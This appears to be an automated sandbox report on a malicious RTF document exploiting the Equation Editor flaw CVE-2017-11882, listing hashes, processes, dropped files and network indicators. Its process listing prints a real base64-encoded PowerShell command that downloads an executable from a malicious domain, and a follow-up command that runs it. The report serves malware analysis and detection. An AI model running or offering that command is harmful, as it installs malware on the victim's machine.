analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

SPEC-EBG250.doc

Full analysis: https://app.any.run/tasks/935404f7-a2a0-4879-8694-9375174e23fb
Verdict: Malicious activity
Analysis date: May 24, 2019, 11:05:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

6E88E18466244444E7EBAD4D1F6A73C2

SHA1:

42476E1CEE0DF92D6EBDA45BCABC50F7AB7AF021

SHA256:

1402032D473A96282142533BD1DEC00DCDBEA3B03545ED7CFB95DE59ED390510

SSDEEP:

24:GQhkHbGDX14mTzDXlI5xax9kCIzxVfsdDYTFe+xOX9ya6bUCUTmc0C2N1WBHShyo:BebGDvTzDXi5xokbzjEsTlzen2HwE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2888)
  • SUSPICIOUS

    • Creates files in the user directory

      • EQNEDT32.EXE (PID: 2888)
      • powershell.exe (PID: 3136)
    • Executes PowerShell scripts

      • EQNEDT32.EXE (PID: 2888)
    • Executed via COM

      • EQNEDT32.EXE (PID: 2888)
    • Reads internet explorer settings

      • EQNEDT32.EXE (PID: 2888)
    • Executed via WMI

      • cmd.exe (PID: 1236)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2792)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2792)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe powershell.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2792"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\SPEC-EBG250.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2888"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3136"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwAHMAOgAvAC8AaQAtAHYAbgBzAHcAZQB5AHUALgBwAGwALwBiAC8AZABvAHAAZQAuAGUAeABlACIALAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAbgB2AGIAYQBjAGsAZQBuAGQALgBlAHgAZQAiACkAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1236cmd /c %temp%\nvbackend.exeC:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 410
Read events
987
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
2

Dropped files

PID
Process
Filename
Type
2792WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE33A.tmp.cvr
MD5:
SHA256:
3136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NSFX5CSYPSGZ8AH3JC3P.temp
MD5:
SHA256:
2888EQNEDT32.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txttext
MD5:FDAE9776561732E6D87946E11A32C0FA
SHA256:3EC16F331C22760FD79C55EF2FCEC4C2EA6175BF07B566E421AF9D1FA5328378
3136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF14edba.TMPbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
3136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
2792WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$EC-EBG250.docpgc
MD5:E02FBDF1DB9A6B9DEE72FF4931AD1627
SHA256:0341B3A90E6D65D66BDB380030E817BC0B3D8EA2D10D4F14A9F8EF994FF7008A
2792WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:52A3D3D71D281367630679E41B07A08A
SHA256:E61FD5FC3EA6B44799A0D33E6FEBD4F24CA03A9A9EBA9C37E2C34348A7E3FE18
2888EQNEDT32.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\8B76wYMT[1].txthtml
MD5:5A20C121D470C27F2BB1AC926B64EC1C
SHA256:B3D04A852AD0BE3397DDAC16EE8B476B3A903845DB6D90224CD0D9B1B5C0C2E7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2888
EQNEDT32.EXE
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.208.21
  • 104.20.209.21
shared
i-vnsweyu.pl
malicious

Threats

No threats detected
No debug info